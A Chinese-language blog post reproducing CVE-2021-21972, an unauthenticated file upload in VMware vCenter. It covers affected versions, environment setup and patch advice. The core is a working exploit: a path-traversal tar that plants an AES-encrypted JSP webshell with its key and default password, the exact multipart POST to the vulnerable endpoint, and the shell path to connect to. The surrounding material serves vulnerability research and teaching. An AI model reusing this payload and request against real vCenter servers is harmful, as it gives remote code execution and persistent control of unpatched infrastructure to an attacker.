• Vmware vcenter未授权任意文件上传(CVE-2021-21972)复现


     
    Vmware vcenter未授权任意文件上传
    (CVE-2021-21972 )
     
    一、漏洞简介
     
    VMware是一家云基础架构和移动商务解决方案厂商,提供基于VMware的虚拟化解决方案。
    高危严重漏洞:
    在 CVE-2021-21972 VMware vCenter Server 远程代码漏洞 中,攻击者可直接通过443端口构造恶意请求,执行任意代码,控制vCenter。
    漏洞为任意文件上传:
    存在问题的接口为
    /ui/vropspluginui/rest/services/uploadova,
    完整路径
    (https://ip:port/ui/vropspluginui/rest/services/uploadova)
     
    二、影响版本
    VMware vCenter Server 7.0系列 < 7.0.U1c
    VMware vCenter Server 6.7系列 < 6.7.U3l
    VMware vCenter Server 6.5系列 < 6.5 U3n
    VMware ESXi 7.0系列 < ESXi70U1c-17325551
    VMware ESXi 6.7系列 < ESXi670-202102401-SG
    VMware ESXi 6.5系列 < ESXi650-202102101-SG
     
    三、环境准备&漏洞复现
    安装EXSI 7.0.0 ​ VMware vSphere虚拟机监控程序(ESXi) 链接:https://cld16.irans3.com/dlir-s3/VMware-VMvisor-Installer-7.0.0-15843807.x86_64.iso VMware-VMvisor-Installer-7.0.0-15843807.x86_64.iso档案大小:350 MB MD5:220d2e87290f50c3508214cadf66b737 SHA1:7fda0401ee1b2f49aae89043f9b2d509cf7e25db 安装:https://blog.51cto.com/10802692/2409826 ​ 下载 vCenter Server ​ VMware vCenter Server 链接:https://cld5.irans3.com/dlir-s3/VMware-VCSA-all-7.0.0-15952498.iso VMware-VCSA-all-7.0.0-15952498.iso档案大小:6.42 GB MD5:94bb30ae83cd5f12e2eecce114d43007 SHA1:17aa2b1ee20e977fb4f8f8391563f57c3e456361 安装:https://blog.csdn.net/qq_38028248/article/details/107712839 (环境安装参考来源:作者: print("")师傅环境部署)
    midi.tar(后台回复:"vmware")获取
     
    ../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/42/0/h5ngc.war/resources/0000755000000000000000000000000014015431210027145 5ustar rootroot../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/42/0/h5ngc.war/resources/shell.jsp0000644000000000000000000000117114015430711030777 0ustar rootroot<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}/*1kdnwbry2LyI7pyA*/%>
    https://ip:port/ui/vropspluginui/rest/services/uploadova
    Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
     
     
     
    返回sucess证明上传tar成功
    访问shell地址:
    https://127.0.0.1/ui/resources/shell.jsp
     
     
    连接木马shell:
     
     
    相关命令执行:
     
     
    具体细节上传点:包
    POST /ui/vropspluginui/rest/services/uploadova HTTP/1.1 Host: 127.0.0.1 Connection: close Accept: application/json Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH8GoragzRFVTw1VD Content-Length: 10425 ​ ------WebKitFormBoundaryH8GoragzRFVTw1VD Content-Disposition: form-data; name="uploadFile"; filename="thelostworld.tar" Content-Type: text/plain ​ ../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/42/0/h5ngc.war/resources/0000755000000000000000000000000014015431210027145 5ustar rootroot../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/42/0/h5ngc.war/resources/shell.jsp0000644000000000000000000000117114015430711030777 0ustar rootroot<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}/*1kdnwbry2LyI7pyA*/%>
     
     
    四、安全建议
     
    1、升级VMware vCenter Server 与 VMware ESXi 至最新版本。
    2、针对 CVE-2021-21972 VMware vCenter Server 远程代码漏洞 与 CVE-2021-21973 VMware vCenter Server SSRF漏洞,可按照 https://kb.vmware.com/s/article/82374 相关措施进行缓解。
    3、针对 CVE-2021-21974 VMware ESXI 堆溢出漏洞,可按照 https://kb.vmware.com/s/article/76372 相关措施进行缓解。
     
    参考:
    https://swarm.ptsecurity.com/unauth-rce-vmware/
    http://www.jsdjbh.gov.cn/tgyj/737.htm
    http://blog.nsfocus.net/cve-2021-21972-cve-2021-21974/
    https://mp.weixin.qq.com/s/tg64Hy8KECjYPHt98vBLcQ
    https://www.o2oxy.cn/3127.html
    https://mp.weixin.qq.com/s/q5EGqPNFVxfHgui54cAVuA
     
     
     
    免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
    转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
     
    订阅查看更多复现文章、学习笔记
    thelostworld
    安全路上,与你并肩前行!!!!
     
     
    个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns
    个人简书:https://www.jianshu.com/u/bf0e38a8d400
    个人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html
    个人博客园:https://www.cnblogs.com/thelostworld/
    FREEBUF主页:https://www.freebuf.com/author/thelostworld?type=article
    语雀博客主页:https://www.yuque.com/thelostworld
     
     
    欢迎添加本公众号作者微信交流,添加时备注一下“公众号”
     
     
     
    转载漏洞复现、代码审计、网络安全相关内容
  • 相关阅读:
    【CTF杂项】常见文件文件头文件尾格式总结及各类文件头
    修复XSS跨站漏洞
    XSS高级利用
    i春秋-百度杯十月场-EXEC
    i春秋-百度杯十月场-vld
    i春秋-百度杯十月场-fuzzing
    阿里云轻量应用服务器debian8.9用apache多端口搭建多站点
    Hdu 1873 看病要排队
    Hdu 1870 愚人节的礼物
    Hdu 1864 最大报销额
  • 原文地址:https://www.cnblogs.com/thelostworld/p/14450201.html
Copyright © 2020-2023  润新知